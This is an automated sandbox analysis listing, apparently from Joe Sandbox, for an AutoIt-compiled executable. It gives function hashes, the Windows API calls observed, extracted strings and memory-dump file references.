                                                                                                      • Opcode ID: bf32088e1404e316b30ee2975a3edba4cd39f8730045fdfd8447757f42bf11b6
                                                                                                      • Instruction ID: a9f6b9f34317e5dbadf3138e22f2da87f465a6355e0abd0d655ca5a549cd3e96
                                                                                                      • Opcode Fuzzy Hash: bf32088e1404e316b30ee2975a3edba4cd39f8730045fdfd8447757f42bf11b6
                                                                                                      • Instruction Fuzzy Hash: 2CE02B0232531121973112799CC25BB5189DFC6790B14286BF985C2276EA849CA2D3B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D713B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                      • API String ID: 2030045667-4017498283
                                                                                                      • Opcode ID: ccffa115dfff499881b26bff8a2482396d8817f7b1822c7d8ffad96c95430eed
                                                                                                      • Instruction ID: 32022b17772365f7f1c84783ec9fb62a67e265d97e3a673ed6d7310a9f673665
                                                                                                      • Opcode Fuzzy Hash: ccffa115dfff499881b26bff8a2482396d8817f7b1822c7d8ffad96c95430eed
                                                                                                      • Instruction Fuzzy Hash: 77E0D8322483183AD21027947C03F857A85CF09B11F14441AF64D949C28EE1649057F9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D2FAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D31102,?,?,?,00D1100A), ref: 00D2FAE7
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00D1100A), ref: 00D31106
                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D1100A), ref: 00D31115
                                                                                                      Strings
                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D31110
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                      • API String ID: 55579361-631824599
                                                                                                      • Opcode ID: 86ed3a92cf17454e72df83088456af3651647903a1c875888a17386d3b10eefc
                                                                                                      • Instruction ID: 70090139756ca2bfb9cc9abe6f1c99c93aa2b066522c5330879fc884051060d8
                                                                                                      • Opcode Fuzzy Hash: 86ed3a92cf17454e72df83088456af3651647903a1c875888a17386d3b10eefc
                                                                                                      • Instruction Fuzzy Hash: 37E06D746003118BD320AF24E8043C3BBF4AB04344F048D2DF886C2791EBB4E484CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00D83905
                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00D8391A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Temp$FileNamePath
                                                                                                      • String ID: aut
                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                      • Opcode ID: 2bed0e34cc2c2940f31b19bb22d493cca7f47268a1d461c9d49953f747b4b0b4
                                                                                                      • Instruction ID: b5d0f4c750a2d8124d7c3a9cecb50b99275fde15d58ff2f4dd69ccf31c68eaae
                                                                                                      • Opcode Fuzzy Hash: 2bed0e34cc2c2940f31b19bb22d493cca7f47268a1d461c9d49953f747b4b0b4
                                                                                                      • Instruction Fuzzy Hash: C8D05BB150031467DA3097549C0DFCB7A6CDB46710F0001917A56D1191DAB0D545C7A4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LocalTime
                                                                                                      • String ID: %.3d$X64
                                                                                                      • API String ID: 481472006-1077770165
                                                                                                      • Opcode ID: 21e2071f5c5a9f2b004f4f7529c5a7194fc2d1c27b9dc5ab011be42806bf6d91
                                                                                                      • Instruction ID: 9e26bedb4e2cc1f6571142d09d9b69a788f1c848d74b79bbeb714ee596e7051e
                                                                                                      • Opcode Fuzzy Hash: 21e2071f5c5a9f2b004f4f7529c5a7194fc2d1c27b9dc5ab011be42806bf6d91
                                                                                                      • Instruction Fuzzy Hash: 32D012B5C04118EBCB909BD0D848CBDB37CA728704F104862F447D1000E634D508AB32
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA2C8B
                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DA2C9E
                                                                                                        • Part of subcall function 00D7F1A7: Sleep.KERNEL32 ref: 00D7F21F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                      • String ID: Shell_TrayWnd
                                                                                                      • API String ID: 529655941-2988720461
                                                                                                      • Opcode ID: c6a05772db072e86b03638d3d3a1d019c2411b8f3f3fdd8a48f85c4cbeee8490
                                                                                                      • Instruction ID: f63fc9ee76b1c8f39ff23c912f2bac3dc72682255fb15e853c7c2a648ad60ac8
                                                                                                      • Opcode Fuzzy Hash: c6a05772db072e86b03638d3d3a1d019c2411b8f3f3fdd8a48f85c4cbeee8490
                                                                                                      • Instruction Fuzzy Hash: 8DD0C936794350BAE668B770DC0FFD67A55AB51B10F500856B64AAA2D0D9A0A80086B4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA2CCB
                                                                                                      • PostMessageW.USER32(00000000), ref: 00DA2CD2
                                                                                                        • Part of subcall function 00D7F1A7: Sleep.KERNEL32 ref: 00D7F21F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                      • String ID: Shell_TrayWnd
                                                                                                      • API String ID: 529655941-2988720461
                                                                                                      • Opcode ID: 47c76ac68e7cef16257aeaae9a72ccba81d9f7f3918fef9d056e634f260d373b
                                                                                                      • Instruction ID: 39649ef39865097f880235d5bfba84d9e7f0acc95f0549155966b3ce126dd446
                                                                                                      • Opcode Fuzzy Hash: 47c76ac68e7cef16257aeaae9a72ccba81d9f7f3918fef9d056e634f260d373b
                                                                                                      • Instruction Fuzzy Hash: 14D0C9367C53507AF668B770DC0FFC67A55AB56B10F500856B64AEA2D0D9A0A80086B8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D4C233
                                                                                                      • GetLastError.KERNEL32 ref: 00D4C241
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D4C29C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1717984340-0
                                                                                                      • Opcode ID: 97ca1b6c8ee94646de2ba61352e5bca5f727e8c24debceb68193697b6e15f03e
                                                                                                      • Instruction ID: 424238e2923cb2a2b8d5e85205ff36d4bbed90174249e178067062787539d947
                                                                                                      • Opcode Fuzzy Hash: 97ca1b6c8ee94646de2ba61352e5bca5f727e8c24debceb68193697b6e15f03e
                                                                                                      • Instruction Fuzzy Hash: B241E631612206EFCB618FE5C884ABE7BA5EF45310F285169F859A71A1DBF08D01DB74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%